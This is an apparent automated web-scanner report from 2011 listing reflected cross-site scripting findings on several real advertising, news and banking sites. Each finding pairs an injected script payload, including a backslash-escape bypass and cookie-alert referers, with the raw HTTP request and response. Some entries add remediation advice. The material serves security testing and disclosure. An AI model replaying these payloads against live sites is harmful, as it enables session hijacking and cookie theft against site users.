This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the apiKey request parameter is copied into the HTML document as plain text between tags. The payload 3767e<script>alert(1)</script>480207bdcb8 was submitted in the apiKey parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a73767e<script>alert(1)</script>480207bdcb8&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback&jsonpContext=request_442381374318&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1 Host: pluckit.demandmedia.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000
Response
HTTP/1.1 200 OK Cache-Control: public, must-revalidate Pragma: PluckOnDemandApiRev=7315 Content-Length: 920 Content-Type: application/json; charset=utf-8 Expires: Thu, 03 Feb 2011 19:03:22 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Thu, 03 Feb 2011 19:03:22 GMT
The value of the jsonpCallback request parameter is copied into the HTML document as plain text between tags. The payload 546ff<script>alert(1)</script>aa268e625b5 was submitted in the jsonpCallback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a7&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback546ff<script>alert(1)</script>aa268e625b5&jsonpContext=request_442381374318&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1 Host: pluckit.demandmedia.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000
Response
HTTP/1.1 200 OK Cache-Control: public, must-revalidate Pragma: PluckOnDemandApiRev=7315 Content-Length: 4368 Content-Type: application/json; charset=utf-8 Expires: Thu, 03 Feb 2011 19:03:26 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Thu, 03 Feb 2011 19:03:25 GMT
The value of the jsonpContext request parameter is copied into the HTML document as plain text between tags. The payload 6b2fe<script>alert(1)</script>7d41626bf96 was submitted in the jsonpContext parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a7&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback&jsonpContext=request_4423813743186b2fe<script>alert(1)</script>7d41626bf96&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1 Host: pluckit.demandmedia.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000
Response
HTTP/1.1 200 OK Cache-Control: public, must-revalidate Pragma: PluckOnDemandApiRev=7315 Content-Length: 4388 Content-Type: application/json; charset=utf-8 Expires: Thu, 03 Feb 2011 19:03:29 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Thu, 03 Feb 2011 19:03:28 GMT
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6506f"><script>alert(1)</script>91c27bc8e67 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=6506f"><script>alert(1)</script>91c27bc8e67&sp=y&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_atf?t=1296754761812&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adImpCount=oh0PP3N04fRnBd11giaMRn0GaIuFFc6KU0t95Ihox42Y481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOa3SJBwxhTK9UwlXAscYO_M4PWvpR2lvg2CTziw80-4erd7x2ac5D5zjijBHgETImH6J7mzrOj8gbZmvqalfHq1zOWaaEkLYgoCjpzZqrIOb4Fr-22QJE64x-hU4KLgyMywYPBSo2jlvAF8lq_IygKlasFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBC
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Tue, 02-Aug-2011 19:03:00 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 19:02:59 GMT Content-Length: 377
The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38030"><script>alert(1)</script>3e8a29e1991 was submitted in the sp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=4&sp=38030"><script>alert(1)</script>3e8a29e1991&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_atf?t=1296754761812&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adImpCount=oh0PP3N04fRnBd11giaMRn0GaIuFFc6KU0t95Ihox42Y481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOa3SJBwxhTK9UwlXAscYO_M4PWvpR2lvg2CTziw80-4erd7x2ac5D5zjijBHgETImH6J7mzrOj8gbZmvqalfHq1zOWaaEkLYgoCjpzZqrIOb4Fr-22QJE64x-hU4KLgyMywYPBSo2jlvAF8lq_IygKlasFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBC
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Tue, 02-Aug-2011 19:03:00 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 19:02:59 GMT Content-Length: 377
4.431. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.wachovia.com
Path:
/selfservice/microsites/wachoviaSearchEntry.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaef9"><script>alert(1)</script>6d3f3e1bc4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /selfservice/microsites/wachoviaSearchEntry.do?aaef9"><script>alert(1)</script>6d3f3e1bc4b=1 HTTP/1.1 Host: search.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=0E2F343A11D72B8481BC40D2D653F4B5; Path=/selfservice Content-Type: text/html;charset=UTF-8 Date: Thu, 03 Feb 2011 13:17:41 GMT Connection: close
The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85494'%3balert(1)//dbe71432c4e was submitted in the h parameter. This input was echoed as 85494';alert(1)//dbe71432c4e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=21818F4&w=300&h=25085494'%3balert(1)//dbe71432c4e&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1 Host: smm.sitescout.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 650 Date: Thu, 03 Feb 2011 16:23:48 GMT Connection: close
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aed62"%3balert(1)//eec28b3a643 was submitted in the pid parameter. This input was echoed as aed62";alert(1)//eec28b3a643 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=21818F4aed62"%3balert(1)//eec28b3a643&w=300&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1 Host: smm.sitescout.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 650 Date: Thu, 03 Feb 2011 16:23:46 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://smm.sitescout.com/disp?pid=21818F4aed62";alert(1)//eec28b3a643&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D885848%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000175%2C1220000175%3Bi%3D0%3Bn%3D1220%3B1%3D8%3B2%3D1%3Bs%3D134%3Bg%3D172%3Bm%3D82%3Bw%3D47%3Bi%3D0%3Bu%3DINmz6woB ...[SNIP]...
The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79fda'%3balert(1)//cbed4520d8d was submitted in the w parameter. This input was echoed as 79fda';alert(1)//cbed4520d8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=21818F4&w=30079fda'%3balert(1)//cbed4520d8d&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1 Host: smm.sitescout.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 650 Date: Thu, 03 Feb 2011 16:23:46 GMT Connection: close
4.435. http://thestreet.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://thestreet.us.intellitxt.com
Path:
/intellitxt/front.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1bad9<script>alert(1)</script>6e86ca26221 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /intellitxt/front.asp?ipid=10685&1bad9<script>alert(1)</script>6e86ca26221=1 HTTP/1.1 Host: thestreet.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA6yAEAAAEthmhrrQA-; VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63AEAAAEt6+c+YAA-; Domain=.intellitxt.com; Expires=Mon, 04-Apr-2011 14:22:36 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: application/x-javascript Vary: Accept-Encoding Date: Thu, 03 Feb 2011 14:22:36 GMT Connection: close Content-Length: 8275
/* This source code is Copyright (c) Vibrant Media 2001-2011 and forms part of the patented Vibrant Media product "IntelliTXT" (sm). */ if('undefined'==typeof $iTXT){var $iTXT={};}if('undefined'==typ ...[SNIP]... ad();}}};function itxtBegin(){ var itxturl='http://thestreet.us.intellitxt.com/v3/door.jsp?ts='+(new Date()).getTime()+'&pagecl='+itxtbtl()+'&enc='+itxtGCE()+'&fv='+gDFVS()+'&muid='+MUID+'&ipid=10685&1bad9<script>alert(1)</script>6e86ca26221=1'; itxturl+='&seid='+gSEID+'&sest='+gSEST; if ($iTXT && $iTXT.js && $iTXT.js.ready) {$iTXT.js.load(itxturl); } else if ($iTXT && $iTXT.js) {$iTXT.js.onload = function() { $iTXT.js.load(itxturl); ...[SNIP]...
The value of the sest request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbce3\'%3balert(1)//470e2868204 was submitted in the sest parameter. This input was echoed as cbce3\\';alert(1)//470e2868204 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /v3/door.jsp?ts=1296742745648&pagecl=2359&enc=&fv=101&muid=&ipid=10685&seid=0&sest=cbce3\'%3balert(1)//470e2868204 HTTP/1.1 Host: thestreet.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63AEAAAEt6+LRYAA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Content-Type: application/x-javascript;charset=iso-8859-1 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 14:22:49 GMT Connection: close Content-Length: 10430
